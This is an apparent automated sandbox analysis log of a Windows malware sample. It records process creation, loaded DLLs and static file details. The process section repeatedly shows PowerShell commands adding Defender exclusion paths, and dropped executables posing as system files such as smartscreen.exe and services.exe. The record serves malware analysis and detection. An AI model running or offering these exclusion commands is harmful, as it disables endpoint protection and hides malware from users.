                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\smartscreen.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\TItoGxsDkTEZBWdlQNGwopi.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
                            Source: unknownProcess created: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\B7heSupDrt.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Program Files (x86)\Windows NT\smartscreen.exe "C:\Program Files (x86)\windows nt\smartscreen.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: unknownProcess created: C:\Program Files (x86)\Windows NT\smartscreen.exe "C:\Program Files (x86)\windows nt\smartscreen.exe"
                            Source: unknownProcess created: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe"
                            Source: unknownProcess created: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe"
                            Source: unknownProcess created: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe
                            Source: unknownProcess created: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Source: unknownProcess created: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
                            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                            Source: unknownProcess created: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
                            Source: unknownProcess created: C:\Program Files (x86)\Windows NT\smartscreen.exe "C:\Program Files (x86)\windows nt\smartscreen.exe"
                            Source: unknownProcess created: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe "C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe"
                            Source: unknownProcess created: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe"
                            Source: unknownProcess created: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
                            Source: unknownProcess created: C:\Program Files (x86)\Windows NT\smartscreen.exe "C:\Program Files (x86)\windows nt\smartscreen.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: mscoree.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: apphelp.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: version.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: wldp.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: profapi.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: sspicli.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: mscoree.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: version.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: wldp.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: profapi.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: mscoree.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: apphelp.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: version.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: wldp.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: profapi.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: mscoree.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: version.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: wldp.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: profapi.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: sspicli.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: mscoree.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: apphelp.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: version.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: wldp.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: profapi.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: sspicli.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: mscoree.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: version.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: wldp.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: profapi.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: sspicli.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: mscoree.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: apphelp.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: kernel.appcore.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: version.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: windows.storage.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: wldp.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: profapi.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: cryptsp.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: rsaenh.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: cryptbase.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: sspicli.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: mscoree.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: kernel.appcore.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: version.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: windows.storage.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: wldp.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: profapi.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: cryptsp.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: rsaenh.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: cryptbase.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: mscoree.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: version.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: wldp.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: profapi.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: sspicli.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: ktmw32.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: wbemcomn.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: amsi.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: userenv.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: iphlpapi.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: dnsapi.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: winnsi.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: rasapi32.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: rasman.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: rtutils.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: mswsock.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: winhttp.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: uxtheme.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: winmm.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: winmmbase.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: mmdevapi.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: devobj.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: ksuser.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: avrt.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: audioses.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: powrprof.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: umpdc.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: msacm32.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: midimap.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: edputil.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: dwrite.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: windowscodecs.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: ntmarta.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: dpapi.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: mscoree.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: version.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: wldp.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: profapi.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe Section loaded: mscoree.dll
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                            Source: Window Recorder Window detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe Directory created: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe Directory created: C:\Program Files\WindowsPowerShell\Configuration\Registration\27d1bcfc3c54e0
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe Static file information: File size 3038208 > 1048576
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2e5400
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.pdb source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, 00000000.00000002.1718805809.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp

                            Data Obfuscation

